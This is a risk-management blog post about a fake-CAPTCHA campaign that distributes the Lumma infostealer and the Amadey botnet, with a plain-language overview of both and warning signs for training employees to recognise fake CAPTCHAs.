The PHLYGateway

Don't Get CAPTURED By Fake CAPTCHA

April 24, 2025

An insidious malware campaign uses fake CAPTCHA tests to distribute malware. The attackers exploit web users' instincts to quickly click through verification tools. This campaign primarily targets users through online ads, adult sites, file-sharing services, betting platforms, anime websites, and web apps that monetize traffic.

The malware involved in this campaign includes Lumma and Amadey.

Lumma is an infostealer that has been available through a malware-as-a-service model on Russian-speaking forums since at least August 2022. Once installed on a victim's device, Lumma searches for files associated with cryptocurrency wallets and steals them. It also attempts to extract cookies and other credentials stored in browsers, including data from password manager archives.

Lumma Stealer provides cybercriminals with several advanced functionalities, making it an effective tool for information theft and further exploitation.

Key features include data exfiltration, automatic updates, data logging, and loader capability. It extracts sensitive data from browsers, cryptocurrency wallets, and applications, focusing on credentials, financial info, and personal data. The malware receives regular updates from its Command-and-Control (C2) servers to enhance evasion techniques and introduce new capabilities. It compiles logs from infected systems, including browser data and clipboard content, for further exploitation.

Additionally, Lumma Stealer acts as a loader, enabling the drop of additional malware, expanding the attack vector to include ransomware or trojans.

Amadey is a botnet that first appeared around 2018 and is currently being sold for about $500 on Russian-speaking hacking forums. Amadey downloads several modules to steal credentials from popular browsers, detects cryptocurrency wallet addresses in the clipboard, and substitutes them with addresses controlled by the attackers. One module can also take screenshots and, in some cases, download the Remcos remote access tool to the victim's device, giving the attackers full control.

One of the ironic elements of this social engineering campaign is that CAPTCHA was meant to stop bots and Amaday is a botnet.

https://therecord.media/fake-captcha-malware-campaign-lumma-amadey and https://cybersecuritynews.com/lumma-stealer/#google_vignette

Commentary

The use of fake CAPTCHA is extremely alarming because few would assume a test meant to stop malware-ridden spam and performed without thought would download two very harmful forms of malware.

CAPTCHA, which stands for "Completely Automated Public Turing test to tell Computers and Humans Apart," is a type of challenge-response test used in computing to determine whether the user is human. The primary purpose of CAPTCHA is to prevent spam and abuse on websites by distinguishing between human users and automated bots.

CAPTCHAs are designed to be easy for humans to solve but difficult for bots. They often involve tasks such as identifying distorted text, selecting images that match a certain criterion, or solving simple puzzles. By requiring users to complete these tasks, CAPTCHAs help protect websites from automated attacks, such as promotion spam, registration spam, and data scraping.

Prevention starts with education of your workforce; specifically, what are the warning signs of CAPTCHA malware:

Legitimate CAPTCHAs are typically found on trusted, well-known sites. A CAPTCHA on a shady site, like a porn site, is suspicious. Employees should not visit sites where malware is often spread, like porn and gambling sites on work devices.
Real CAPTCHAs don't ask for sensitive data like your name, email, or password. If a CAPTCHA prompt requests such information, it is likely malicious.
If completing the CAPTCHA redirects you to a suspicious site or triggers odd pop-ups, there's a good chance the CAPTCHA was fake.
Fake CAPTCHAs may hijack your clipboard by copying malicious code to it. If you notice unusual clipboard activity after interacting with a CAPTCHA, it could be a sign of malware.
Legitimate CAPTCHAs typically require simple tasks like selecting images or typing text. If a CAPTCHA asks you to perform additional steps, such as running commands or downloading files, it is likely malicious.
While HTTPS is generally a sign of security, attackers may use it to create a convincing illusion of legitimacy. Be cautious if a CAPTCHA page uses HTTPS but seems suspicious.

The final takeaway is if your workforce is aware of these indicators, you can better protect yourself from CAPTCHA malware

Sources: https://support.google.com/recaptcha/?hl=en and https://en.wikipedia.org/wiki/CAPTCHA and https://www.tomsguide.com/computing/online-security/hackers-are-using-recaptcha-to-trick-users-into-infecting-their-own-pcs-with-malware-how-to-stay-safe and https://cybersecuritynews.com/beware-of-fake-captcha-prompts-that-may-install-lummastealer/#google_vignette

Finally, your opinion is important to us. Please complete the opinion survey:

The PHLYGateway

Your gateway to a suite of risk management resources aimed at helping to mitigate Management and Professional Liability risk.

Log In